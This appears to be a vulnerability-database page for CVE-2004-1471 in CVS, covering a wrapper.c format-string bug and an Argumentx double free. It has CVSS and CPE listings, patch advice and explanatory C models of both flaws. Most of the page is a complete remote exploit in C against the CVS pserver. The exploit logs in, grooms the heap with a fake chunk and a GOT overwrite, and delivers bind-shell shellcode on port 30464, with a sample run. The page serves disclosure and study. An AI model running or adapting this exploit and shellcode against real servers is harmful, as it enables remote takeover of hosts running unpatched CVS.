CVE-2004-1471
CVSS 7.1
Published: 2004-12-31 00:00:00
Last revised: 2008-09-05 16:41:29

[Original] Format string vulnerability in wrapper.c in CVS 1.12.x through 1.12.8, and 1.11.x through 1.11.16 allows remote attackers with CVSROOT commit access to cause a denial of service (application crash) and possibly execute arbitrary code via format string specifiers in a wrapper line.
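The CVE text above describes the bug class only in one clause: text taken from a wrapper line reaches a printf-style call as the format argument. The following is an added example, not code from CVS or from this page, that models that reporting path in a simplified form. The names `report`, `reject_wrapper_line_vuln`, `reject_wrapper_line_fixed` and `has_format_directive` are mine, and `report` is only an assumed stand-in for CVS's own variadic error routine; the sample wrapper lines are constructed for the demonstration.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Assumed shape of a printf-style error sink: formats into a caller buffer.
   No format attribute on purpose, so the compiler cannot see the misuse,
   which is exactly the situation a code reviewer has to catch by hand. */
static void report(char *out, size_t outlen, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out, outlen, fmt, ap);
    va_end(ap);
}

/* Vulnerable shape: the offending wrapper line *is* the format string, so
   "%x", "%s" or "%n" written into CVSROOT/cvswrappers drive vsnprintf. */
void reject_wrapper_line_vuln(const char *line, char *out, size_t outlen)
{
    report(out, outlen, line);
}

/* Hardened shape: the line is passed as data behind a fixed "%s" format. */
void reject_wrapper_line_fixed(const char *line, char *out, size_t outlen)
{
    report(out, outlen, "%s", line);
}

/* Returns 1 if text contains a conversion directive: a '%' that is not the
   literal escape "%%". A cheap pre-check for any repository control file
   whose contents may later be echoed through a printf-family call. */
int has_format_directive(const char *text)
{
    for (const char *p = text; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {   /* "%%" is a literal percent sign */
            p++;
            continue;
        }
        return 1;
    }
    return 0;
}

int main(void)
{
    char out[128];
    const char *hostile = "*.gif -k '%x%x%n'";   /* constructed sample line */

    reject_wrapper_line_fixed(hostile, out, sizeof out);
    printf("fixed path echoes the line verbatim: %s\n", out);
    printf("directive present: %d\n", has_format_directive(hostile));
    /* reject_wrapper_line_vuln(hostile, ...) is deliberately not run here:
       it would let the '%n' write through whatever is on the stack. */
    return 0;
}
```

The two functions differ by one argument, which is why this class of bug survives review: only the call site reveals whether the line is format or data. The detector is not a substitute for the fix, but it is what a server should apply when it parses a wrapper line, before that line can reach any reporting path.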


[CNNVD] CVS Argumentx command error_prog_name double-free arbitrary code execution vulnerability (CNNVD-200412-265)

        
        Concurrent Versions System (CVS) is an open-source version control system.
        The CVS "Argumentx" command has a double-free flaw that a remote attacker can use to execute arbitrary code on the system with the privileges of the CVS server process. (This CNNVD summary describes the Argumentx double free; the CVE text above names a different bug from the same June 2004 advisory batch, the wrapper.c format string. Both are covered by BID 10499 below.)
        "Argumentx" appends further data to a previously supplied argument by realloc()ing the last stored argument. It does not check whether any argument has actually been stored, so with an empty argument list the realloc() operates on a pointer that must never be touched this way, the error_prog_name string, and its original chunk is released. When the client disconnects the server frees that string again, so the same chunk is freed a second time. This double-free has been exploited successfully on several Linux systems; the exploit on this page first authenticates to the pserver with a valid login and password.
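The paragraph above explains the bug as a state-machine mistake: Argumentx operates on "the last stored argument" without first checking that one exists. The following is an added example, not CVS's own code and not from the exploit on this page, that models that state machine in C with the vulnerable and the hardened handler side by side. The layout follows the exploit header further down (slot 0 of argument_vector holds error_prog_name, real Arguments start at slot 1) and is an assumption; the names `session`, `serve_argument`, `serve_argumentx_vuln`, `serve_argumentx_fixed` and `session_close` are mine, and the hardened check is how the fix is assumed to work, since the page only states that 1.11.17 and 1.12.9 fix the bug. The model reports the second free instead of executing it, so the program stays well defined.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static char *xstrdup(const char *str)
{
    size_t n = strlen(str) + 1;
    char *copy = malloc(n);
    memcpy(copy, str, n);
    return copy;
}

/* Minimal model of the pserver argument state (assumed layout). */
struct session {
    char **argument_vector;
    int    argument_count;
    int    argument_vector_size;
    char  *error_prog_name;
    int    prog_name_chunk_released;   /* bookkeeping for the model only */
};

void session_init(struct session *s)
{
    s->argument_vector_size = 3;
    s->argument_vector = calloc((size_t)s->argument_vector_size, sizeof(char *));
    s->error_prog_name = xstrdup("cvs server");
    s->argument_vector[0] = s->error_prog_name;   /* slot 0 is not an Argument */
    s->argument_count = 1;
    s->prog_name_chunk_released = 0;
}

/* "Argument <arg>": store a copy as a new argument, growing the vector. */
void serve_argument(struct session *s, const char *arg)
{
    if (s->argument_count >= s->argument_vector_size) {
        s->argument_vector_size *= 2;
        s->argument_vector = realloc(s->argument_vector,
                                     (size_t)s->argument_vector_size * sizeof(char *));
    }
    s->argument_vector[s->argument_count++] = xstrdup(arg);
}

/* Shared append: realloc() the last stored argument and add "\n<arg>".
   realloc() takes ownership of the old chunk; whoever else still holds
   that pointer now holds a dangling one. */
static void append_to_last(struct session *s, const char *arg)
{
    char *p = s->argument_vector[s->argument_count - 1];
    p = realloc(p, strlen(p) + 1 + strlen(arg) + 1);
    strcat(p, "\n");
    strcat(p, arg);
    s->argument_vector[s->argument_count - 1] = p;
}

/* Vulnerable shape: no check that an Argument precedes Argumentx. With
   argument_count == 1 the "last argument" is slot 0, so the chunk behind
   error_prog_name is handed to realloc(). Returns 1 when that happened. */
int serve_argumentx_vuln(struct session *s, const char *arg)
{
    int hits_prog_name = (s->argument_vector[s->argument_count - 1] == s->error_prog_name);
    append_to_last(s, arg);
    if (hits_prog_name)
        s->prog_name_chunk_released = 1;
    return hits_prog_name;
}

/* Hardened shape (assumed): refuse Argumentx unless a real Argument is
   stored. Returns 0 on success, -1 for the protocol error. */
int serve_argumentx_fixed(struct session *s, const char *arg)
{
    if (s->argument_count <= 1)
        return -1;
    append_to_last(s, arg);
    return 0;
}

/* Teardown on client disconnect: free the Arguments and error_prog_name.
   If realloc() already released the error_prog_name chunk, the server's
   free(error_prog_name) is the double free; the model returns 1 for that
   case and frees the replacement chunk instead. */
int session_close(struct session *s)
{
    int double_free = s->prog_name_chunk_released;
    for (int i = 1; i < s->argument_count; i++)
        free(s->argument_vector[i]);
    if (double_free)
        free(s->argument_vector[0]);
    else
        free(s->error_prog_name);
    free(s->argument_vector);
    return double_free;
}

int main(void)
{
    struct session s;
    session_init(&s);
    printf("Argumentx before any Argument touches error_prog_name: %d\n",
           serve_argumentx_vuln(&s, "AAAA"));
    printf("disconnect would double-free: %d\n", session_close(&s));
    return 0;
}
```

The ordering matters: the first free happens inside realloc() long before the teardown, which is why the exploit below has time to reshape the heap with fifty further Argument lines before closing the connection triggers the second free.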
        

- CVSS (base score)

CVSS score: 7.1 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can result in a complete system outage]
Access complexity: HIGH [exploitation requires specialised access conditions]
Access vector: NETWORK [the attacker needs neither local nor intranet access]
Authentication: SINGLE_INSTANCE [one authentication is required, matching the commit access named in the CVE text]

- CPE (affected platforms and products)

cpe:/o:freebsd:freebsd:5.1 (FreeBSD 5.1)
cpe:/a:cvs:cvs:1.11.11
cpe:/o:freebsd:freebsd:2.1.6 (FreeBSD 2.1.6)
cpe:/o:freebsd:freebsd:4.3:releng
cpe:/o:freebsd:freebsd:4.6.2 (FreeBSD 4.6.2)
cpe:/o:freebsd:freebsd:5.0 (FreeBSD 5.0)
cpe:/a:cvs:cvs:1.11.2
cpe:/o:freebsd:freebsd:3.5:stable
cpe:/o:freebsd:freebsd:2.2.4 (FreeBSD 2.2.4)
cpe:/o:freebsd:freebsd:4.6:stable
cpe:/a:cvs:cvs:1.12.1
cpe:/o:freebsd:freebsd:2.1.0 (FreeBSD 2.1.0)
cpe:/o:freebsd:freebsd:4.7:releng
cpe:/o:freebsd:freebsd:4.3:release_p38
cpe:/o:freebsd:freebsd:4.1.1:stable
cpe:/o:freebsd:freebsd:2.2 (FreeBSD 2.2)
cpe:/o:freebsd:freebsd:3.0:releng
cpe:/o:openbsd:openbsd:3.4 (OpenBSD 3.4)
cpe:/a:openpkg:openpkg:1.3 (OpenPKG 1.3)
cpe:/o:freebsd:freebsd:3.0 (FreeBSD 3.0)
cpe:/a:cvs:cvs:1.11.10
cpe:/o:freebsd:freebsd:2.2.3 (FreeBSD 2.2.3)
cpe:/o:freebsd:freebsd:5.2 (FreeBSD 5.2)
cpe:/a:cvs:cvs:1.11.4
cpe:/o:freebsd:freebsd:4.5:stable
cpe:/o:freebsd:freebsd:4.6:release
cpe:/o:freebsd:freebsd:2.1.6.1 (FreeBSD 2.1.6.1)
cpe:/o:freebsd:freebsd:4.5 (FreeBSD 4.5)
cpe:/o:freebsd:freebsd:4.9 (FreeBSD 4.9)
cpe:/o:freebsd:freebsd:4.0:releng
cpe:/o:freebsd:freebsd:4.7:release
cpe:/a:cvs:cvs:1.11.1
cpe:/o:freebsd:freebsd:4.3:stable
cpe:/o:freebsd:freebsd:4.5:release_p32
cpe:/o:freebsd:freebsd:4.2:stable
cpe:/o:freebsd:freebsd:4.3:release
cpe:/a:cvs:cvs:1.11.1_p1
cpe:/o:freebsd:freebsd:5.0:release_p14
cpe:/o:freebsd:freebsd:4.6 (FreeBSD 4.6)
cpe:/a:cvs:cvs:1.12.2
cpe:/o:freebsd:freebsd:3.4 (FreeBSD 3.4)
cpe:/o:freebsd:freebsd:5.1:releng
cpe:/a:cvs:cvs:1.11.3
cpe:/o:freebsd:freebsd:2.2.8 (FreeBSD 2.2.8)
cpe:/a:cvs:cvs:1.12.8
cpe:/o:freebsd:freebsd:3.1 (FreeBSD 3.1)
cpe:/o:freebsd:freebsd:4.7:stable
cpe:/a:cvs:cvs:1.11.14
cpe:/o:freebsd:freebsd:4.9:releng
cpe:/o:freebsd:freebsd:4.5:release
cpe:/o:freebsd:freebsd:4.8 (FreeBSD 4.8)
cpe:/o:freebsd:freebsd:4.8:pre-release
cpe:/o:freebsd:freebsd:4.10 (FreeBSD 4.10)
cpe:/a:cvs:cvs:1.11.16
cpe:/a:cvs:cvs:1.11.6
cpe:/a:cvs:cvs:1.10.8
cpe:/o:freebsd:freebsd:4.3 (FreeBSD 4.3)
cpe:/o:freebsd:freebsd:4.8:releng
cpe:/o:freebsd:freebsd:3.5.1:release
cpe:/o:freebsd:freebsd:4.8:release_p6
cpe:/o:openbsd:openbsd:3.5 (OpenBSD 3.5)
cpe:/a:cvs:cvs:1.11.5
cpe:/o:freebsd:freebsd:2.2.5 (FreeBSD 2.2.5)
cpe:/o:freebsd:freebsd:5.2.1:release
cpe:/o:freebsd:freebsd:3.5.1 (FreeBSD 3.5.1)
cpe:/a:sgi:propack:3.0 (SGI ProPack 3.0)
cpe:/a:cvs:cvs:1.11
cpe:/o:freebsd:freebsd:4.9:pre-release
cpe:/o:freebsd:freebsd:3.5.1:stable
cpe:/o:freebsd:freebsd:4.7:release_p17
cpe:/o:freebsd:freebsd:3.2 (FreeBSD 3.2)
cpe:/o:freebsd:freebsd:2.0.5 (FreeBSD 2.0.5)
cpe:/o:freebsd:freebsd:4.7 (FreeBSD 4.7)
cpe:/o:freebsd:freebsd:3.5 (FreeBSD 3.5)
cpe:/o:freebsd:freebsd:5.1:release
cpe:/o:freebsd:freebsd:4.4:release_p42
cpe:/o:freebsd:freebsd:4.10:release
cpe:/o:freebsd:freebsd:4.1.1:release
cpe:/o:freebsd:freebsd:4.2 (FreeBSD 4.2)
cpe:/o:freebsd:freebsd:2.2.6 (FreeBSD 2.2.6)
cpe:/o:freebsd:freebsd:4.4:stable
cpe:/o:freebsd:freebsd:5.1:alpha
cpe:/a:cvs:cvs:1.11.15
cpe:/o:freebsd:freebsd:4.6:releng
cpe:/o:openbsd:openbsd:current
cpe:/o:freebsd:freebsd:2.0 (FreeBSD 2.0)
cpe:/a:cvs:cvs:1.12.5
cpe:/a:openpkg:openpkg:current
cpe:/o:freebsd:freebsd:2.2.2 (FreeBSD 2.2.2)
cpe:/o:freebsd:freebsd:1.1.5.1 (FreeBSD 1.1.5.1)
cpe:/o:freebsd:freebsd:4.0 (FreeBSD 4.0)
cpe:/o:freebsd:freebsd:4.10:releng
cpe:/o:freebsd:freebsd:2.1.7.1 (FreeBSD 2.1.7.1)
cpe:/o:freebsd:freebsd:5.1:release_p5
cpe:/a:openpkg:openpkg:2.0 (OpenPKG 2.0)
cpe:/a:sgi:propack:2.4 (SGI ProPack 2.4)
cpe:/o:freebsd:freebsd:4.6:release_p20
cpe:/a:cvs:cvs:1.12.7
cpe:/o:freebsd:freebsd:5.0:releng
cpe:/o:freebsd:freebsd:4.4:releng
cpe:/o:freebsd:freebsd:5.0:alpha
cpe:/o:freebsd:freebsd:4.4 (FreeBSD 4.4)
cpe:/o:freebsd:freebsd:4.5:releng
cpe:/o:freebsd:freebsd:4.1 (FreeBSD 4.1)
cpe:/o:freebsd:freebsd:2.1.5 (FreeBSD 2.1.5)
cpe:/o:freebsd:freebsd:4.1.1 (FreeBSD 4.1.1)
cpe:/a:cvs:cvs:1.10.7
cpe:/o:gentoo:linux:1.4 (Gentoo Linux 1.4)
cpe:/o:freebsd:freebsd:5.2.1:releng
cpe:/o:freebsd:freebsd:3.3 (FreeBSD 3.3)
cpe:/o:freebsd:freebsd:4.0:alpha

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1471
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1471
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-265
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/10499
(PATCH)  BID  10499
http://xforce.iss.net/xforce/xfdb/16365
(UNKNOWN)  XF  cvs-wrapper-format-string(16365)
http://lists.grok.org.uk/pipermail/full-disclosure/2004-June/022441.html
(VENDOR_ADVISORY)  FULLDISC  20040609 Advisory 09/2004: More CVS remote vulnerabilities
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-04:14.cvs.asc
(VENDOR_ADVISORY)  FREEBSD  FreeBSD-SA-04:14

- Vulnerability information

CVS Argumentx command error_prog_name double-free arbitrary code execution vulnerability
Severity: High   Type: Unknown
Published: 2004-12-31 00:00:00   Updated: 2007-05-14 00:00:00
Attack vector: Remote
        
        

- Advisories and patches

        Vendor patches:
        CVS
        ---
        The vendor has fixed this issue in CVS 1.11.17 and 1.12.9; download from the vendor's site:
        https://ccvs.cvshome.org/files/documents/19/194/cvs-1.11.17.tar.gz
        https://ccvs.cvshome.org/files/documents/19/201/cvs-1.12.9.tar.gz
        Alternatively, NSFOCUS recommends running a chrooted CVS server over SSH instead of :pserver: mode:
        
        http://www.netsys.com/library/papers/chrooted-ssh-cvs-server.txt
        Switching transports does not remove the bug itself: it takes the password-authenticated pserver listener on port 2401, which the exploit below connects to, off the network and confines the server process, so the upgrade is still required.

- Vulnerability information (24182)

CVS 1.11.x Multiple Vulnerabilities (EDBID:24182)
linux local
2004-06-09 Verified
0 Gyan Chawdhary
N/A
source: http://www.securityfocus.com/bid/10499/info

CVS is prone to multiple vulnerabilities. The issues include a double free vulnerability, format string vulnerabilities, and integer overflows. There is also a null termination issue in the security patch for BID 10384, potentially leading to a server crash. Some of these issues may be leveraged to execute arbitrary code, while other issues may only result in a denial of service.

/* Remote CVS <= 1.11.15 exploit for the error_prog_name double free vuln.
*
* by Gyan Chawdhary, gunnu45 hotmail com
*
* Vulnerability Description:
*
* The Vulnerability lies in the serve_argumentx function. The Argumentx command
* parameter is used to append data to a previously supplied Argument command.
* These data pointers are stored in the argument_vector array. The
* serve_argumentx fails to check whether an Argument command is present in the
* argument_vector and may append data to a pointer that should not get
* touched at all, in our case the *error_prog_name string. The function calls
* realloc to create space for the new string. Because realloc will be called
* to store strlen(error_prog_name) + strlen(somedata) the original chunk which
* just stores error_prog_name will get freed. This free chunk will once again
* get freed after we disconnect from the CVS pserver.
*
* Theory:
*
* Successful exploitation depends heavily on a specific heap layout to be met.
* The argument_vector is initialized for holding 3 ptrs. If more space is
* required it will call realloc. The error_prog_name string resides right
* after the argument_vector chunk.
*
* |11| arg_vector |11| error_prog_name |109| some chunk
*
* address of error_prog_name is stored in the argument_vector[0].
*
* To achieve successful exploitation the following steps are performed.
*
* 1) Send Argumentx command with a large argument to reallocate error_prog_name
* + large command on top of the heap. This will free the original
* error_prog_name buffer.
*
* 2) Send 50 Argument calls which will require the argument_vector array to be
* reallocated freeing the current buffer. We keep this a high number to get
* mem from the top itself and to make the exploit reliable. As both the
* original arg_vector & err_prg_name buffers are free they are
* consolidated. Also we supply our fake chunk and shellcode in this call.
*
* 3) Send an argument command with the size & prevsize as its arguments. This
* will now be stored in arg_vector & err_prg_name consolidated buffer.
*
* 4) Once we close the connection free will be called on the error_prog_name
* string which will read our fake size & prev_size fields pointing to the fake
* chunk, executing our shellcode.
*
* Phew !!!!
*
* NOTES: I've tried this exp on RH 8 with glibc 2.3.*. This exp did NOT work on
* my slack 8.0 cause of glibc 2.2 which creates a very different heap layout.
* Also some tweaking will be required to use this exploit remotely as sometimes
* the overwritten GOT does not execute due to early drop in the connection ..
* Please someone figure it out n mail me :) ..
*
* Now the exploit
*
* FOR EDUCATIONAL PURPOSE ONLY FOR EDUCATIONAL PURPOSE ONLY FOR EDUCATIONAL
* PURPOSE ONLY FOR EDUCATIONAL PURPOSE ONLY FOR EDUCATIONAL PURPOSE ONLY FOR
* EDUCATIONAL PURPOSE ONLY FOR EDUCATIONAL PURPOSE ONLY FOR EDUCATIONAL PURPOSE *
*
* Greets: jp - for his cool paper on advanced malloc exploits, and the heapy.so
* jaguar@felinemenace - We at ... :P
*
* cya
*
* Gyan
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr() */

char shellcode[] =
"\xeb\x18"
"AAAAAAAAAAAAAAAAAAAAAAAA"
"\x31\xc0" // xorl %eax,%eax
"\x31\xdb" // xorl %ebx,%ebx
"\x31\xc9" // xorl %ecx,%ecx
"\x31\xd2" // xorl %edx,%edx
"\xb0\x66" // movb $0x66,%al
"\xb3\x01" // movb $0x1,%bl
"\x51" // pushl %ecx
"\xb1\x06" // movb $0x6,%cl
"\x51" // pushl %ecx
"\xb1\x01" // movb $0x1,%cl
"\x51" // pushl %ecx
"\xb1\x02" // movb $0x2,%cl
"\x51" // pushl %ecx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\xcd\x80" // int $0x80

/* port is 30464 !!! */
/* bind(fd, (struct sockaddr)&sin, sizeof(sin) ) */
"\xb3\x02" // movb $0x2,%bl
"\xb1\x02" // movb $0x2,%cl
"\x31\xc9" // xorl %ecx,%ecx
"\x51" // pushl %ecx
"\x51" // pushl %ecx
"\x51" // pushl %ecx
/* port = 0x77, change if needed */
"\x80\xc1\x77" // addb $0x77,%cl
"\x66\x51" // pushl %cx
"\xb1\x02" // movb $0x2,%cl
"\x66\x51" // pushw %cx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\xb2\x10" // movb $0x10,%dl
"\x52" // pushl %edx
"\x51" // pushl %ecx
"\x50" // pushl %eax
"\x8d\x0c\x24" // leal (%esp),%ecx
"\x89\xc2" // movl %eax,%edx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x66" // movb $0x66,%al
"\xcd\x80" // int $0x80

/* listen(fd, 1) */
"\xb3\x01" // movb $0x1,%bl
"\x53" // pushl %ebx
"\x52" // pushl %edx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x66" // movb $0x66,%al
"\x80\xc3\x03" // addb $0x3,%bl
"\xcd\x80" // int $0x80

/* cli = accept(fd, 0, 0) */
"\x31\xc0" // xorl %eax,%eax
"\x50" // pushl %eax
"\x50" // pushl %eax
"\x52" // pushl %edx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\xb3\x05" // movl $0x5,%bl
"\xb0\x66" // movl $0x66,%al
"\xcd\x80" // int $0x80

/* dup2(cli, 0) */
"\x89\xc3" // movl %eax,%ebx
"\x31\xc9" // xorl %ecx,%ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3f" // movb $0x3f,%al
"\xcd\x80" // int $0x80

/* dup2(cli, 1) */
"\x41" // inc %ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3f" // movl $0x3f,%al
"\xcd\x80" // int $0x80

/* dup2(cli, 2) */
"\x41" // inc %ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3f" // movb $0x3f,%al
"\xcd\x80" // int $0x80

/* execve("//bin/sh", ["//bin/sh", NULL], NULL); */
"\x31\xdb" // xorl %ebx,%ebx
"\x53" // pushl %ebx
"\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e
"\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f
"\x89\xe3" // movl %esp,%ebx
"\x8d\x54\x24\x08" // leal 0x8(%esp),%edx
"\x31\xc9" // xorl %ecx,%ecx
"\x51" // pushl %ecx
"\x53" // pushl %ebx
"\x8d\x0c\x24" // leal (%esp),%ecx
"\x31\xc0" // xorl %eax,%eax
"\xb0\x0b" // movb $0xb,%al
"\xcd\x80" // int $0x80

/* exit(%ebx) */
"\x31\xc0" // xorl %eax,%eax
"\xb0\x01" // movb $0x1,%al
"\xcd\x80"; // int $0x80

void login(char *, char *, char *);

struct          sockaddr_in s;
int             sock;

void xp_connect(char *ip)
{
        s.sin_family = AF_INET;
        s.sin_port = htons(2401);          /* pserver port */
        s.sin_addr.s_addr = inet_addr(ip);

        if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        {
                printf("Cannot create socket\n");
                exit(-1);
        }

        if((connect(sock,(struct sockaddr *)&s,sizeof(struct sockaddr))) < 0)
        {
                printf("Cannot connect()\n");
                exit(-1);
        }
}

void xp_write(char *data)
{

	if(write (sock, data, strlen(data)) < 0)
	{
	 printf("write() failed\n");
	 exit(-1);
	}
}

void xp_receive()
{
	int tmp;
	char buffer[1024*2];

	/* read() does not NUL-terminate: leave room for the terminator */
	if ( (tmp = read(sock, buffer, sizeof(buffer) - 1)) <= 0)
	{
		printf("read() failed\n");
		exit(-1);
	}
	buffer[tmp] = '\0';
	printf("%s", buffer);
}




#define GOT_MEMCPY 0x80d2b4a
#define SHELL_ADDR 0x080cda20

char *egg(unsigned int what, unsigned int where)
{
        char *ptr, *buf;
        int i=0;
        int size = strlen(shellcode);

        // Will contain our fake chunk supplied with our fd & bk fields,
        // addr of shellcode & got addr - 8 of free(). We will also try to
        // stuff in our shellcode in the same buffer as I dont have enough
        // gdb patience/time  to find nother controlable buffer :P
        buf = (char *)malloc(1250);
        ptr = buf;

        /* 4-byte (i386) stores: the target is a 32-bit glibc heap */
        for (;i<1248;) {

        *( (unsigned int *)ptr ) = where - 8;
        ptr+=4;
        *( (unsigned int *)ptr ) = what;
        ptr+=4;

        i+=8;
        }
        buf[1249] = '\0';   /* last byte of the 1250-byte allocation */
        ptr -= size;
	strcpy(ptr, shellcode);
        ptr = buf;
        return ptr;

}

unsigned char shifts[] = {
      0,  1,  2,  3,  4,  5,  6,  7,  8,  9, 10, 11, 12, 13, 14, 15,
      16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31,
      114,120, 53, 79, 96,109, 72,108, 70, 64, 76, 67,116, 74, 68, 87,
      111, 52, 75,119, 49, 34, 82, 81, 95, 65,112, 86,118,110,122,105,
      41, 57, 83, 43, 46,102, 40, 89, 38,103, 45, 50, 42,123, 91, 35,
      125, 55, 54, 66,124,126, 59, 47, 92, 71,115, 78, 88,107,106, 56,
      36,121,117,104,101,100, 69, 73, 99, 63, 94, 93, 39, 37, 61, 48,
      58,113, 32, 90, 44, 98, 60, 51, 33, 97, 62, 77, 84, 80, 85,223,
      225,216,187,166,229,189,222,188,141,249,148,200,184,136,248,190,
      199,170,181,204,138,232,218,183,255,234,220,247,213,203,226,193,
      174,172,228,252,217,201,131,230,197,211,145,238,161,179,160,212,
      207,221,254,173,202,146,224,151,140,196,205,130,135,133,143,246,
      192,159,244,239,185,168,215,144,139,165,180,157,147,186,214,176,
      227,231,219,169,175,156,206,198,129,164,150,210,154,177,134,127,
      182,128,158,208,162,132,167,209,149,241,153,251,237,236,171,195,
      243,233,253,240,194,250,191,155,142,137,245,235,163,242,178,152 };

char   *scramble(char * str)
{
    int                 i;
    char                * s;

    s = (char *) malloc (strlen (str) + 3);
    memset(s, '\0', strlen(str) + 3);
    *s = 'A';
    for (i = 1; str[i - 1]; i++)
    s[i] = shifts[(unsigned char)(str[i - 1])];
    return (s);
}

/* NB: the auth request hard-codes /home/cvsroot; it must match the -r path */
#define LOGIN "BEGIN AUTH REQUEST\n/home/cvsroot\n%s\n%s\nEND AUTH REQUEST\n"
#define REQUEST "Root %s\n"

void login(char *login, char *password, char *repo)
{
	char *buf, *ptr, reply[1024];
	char *rep, *rp;
	buf = (char *)malloc(1024);
	rep = (char *)malloc(512);

	ptr = buf;
	rp = rep;
	sprintf(ptr, LOGIN, login, scramble(password));
	sprintf(rp, REQUEST, repo);

	ptr = buf;

	xp_write(ptr); /* login request */
	xp_receive();
	xp_write(rp); /* root dir request */


}

char argumentx[] = "Argumentx %s\n";
char argument[] =  "Argument %s\n";
char trash[] = "FCUK";
char str[] = "Argument \x42\x42\x42\x42\x6e\xff\xff\xff\x1c\xfc\xff\xff"
	     "\xf0\xff\xff\xff\x41\x41\n";

void overflow()
{
   	char *data, *dptr, *buf, *bufp, *eg, *arg, *aptr;
	int i;
	data = (char *)malloc(111111 + 1);
	dptr = data;
	buf = (char *)malloc(111111+20);
	bufp = buf;
	arg = (char *)malloc(1500);
	aptr = arg;

	/* step 1: one huge Argumentx, realloc()ing error_prog_name away */
	memset(dptr, '\x41', 111111);
	dptr[111111] = '\0';            /* %s needs a terminator */
	sprintf(bufp, argumentx, data);
	xp_write(bufp);

	/* step 2: 50 Argument lines carrying the fake chunk + shellcode */
	eg = egg(GOT_MEMCPY, SHELL_ADDR);
	sprintf(aptr, argument, eg);

	for (i=0 ; i<50; i++)
	xp_write(aptr);

	/* step 3: the size/prev_size fields, then junk before disconnecting */
	xp_write(str);
	xp_write(trash);
}



void usage(char *name)
{
	printf("CVS <= 1.11.15 Argumentx double free() remote exploit by Gyan "
	       "Chawdhary (gunnu45@hotmail.com)\n"
       	       "Usage: %s <options>\n"
	       "-i <target IP address>\n"
	       "-l <login>\n"
	       "-p <password>\n"
	       "-r <repository path>\n\n", name);
}



int main(int argc, char **argv)
{
	int c;
	/* zero-filled so the strncpy() copies below are always terminated */
	char ip[16] = {0}, user[32] = {0}, pass[32] = {0}, rep[512] = {0};

	if (argc < 2) {
		usage(argv[0]);
		exit(0);
	}

	while ((c = getopt(argc, argv, "h::l:p:i:r:")) != -1) {

		switch(c) {

			case 'h':
				usage(argv[0]);
				exit(0);
			case 'i':
				strncpy(ip, optarg, sizeof(ip) - 1);
				break;
			case 'l':
				strncpy(user, optarg, sizeof(user) - 1);
				break;
			case 'p':
				strncpy(pass, optarg, sizeof(pass) - 1);
				break;
			case 'r':
				strncpy(rep, optarg, sizeof(rep) - 1);
				break;
		}
	}

	if (!ip[0]) {            /* the array itself is never NULL; test its content */
		usage(argv[0]);
		exit(1);
	}
	printf("Connecting to vulnerable CVS server ...");
	xp_connect(ip);
	printf("OK\n");

        printf("Logging in ...");
        login(user, pass, rep);
	printf("OK\n");

      printf("Exploiting the CVS error_prog_name double free now ...");
      overflow();
      printf("DONE\n");
      printf("If everything went well there should be a shell on port 30464\n");
      return 0;
}





//	xp_connect("127.0.0.1");
//	sleep(20);
//	login("gyan", "gyan");
//	overflow(shellcode);

/*

[root@ill crazy]# ./free -i 127.0.0.1 -l gyan -p gyan -r /home/cvsroot
Connecting to vulnerable CVS server ...OK
Logging in ...I LOVE YOU
OK
Exploiting the CVS error_prog_name double free now ...DONE
If everything went well there should be a shell on port 30464
[root@ill crazy]# telnet 127.0.0.1 30464
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.

*/		

- Vulnerability information

15727
CVS Wrapper Line Format String
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2004-06-09 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Author

Unknown or Incomplete
 

 

About the SCAP Chinese community

The SCAP Chinese community is the first Chinese-language open community devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's own websites.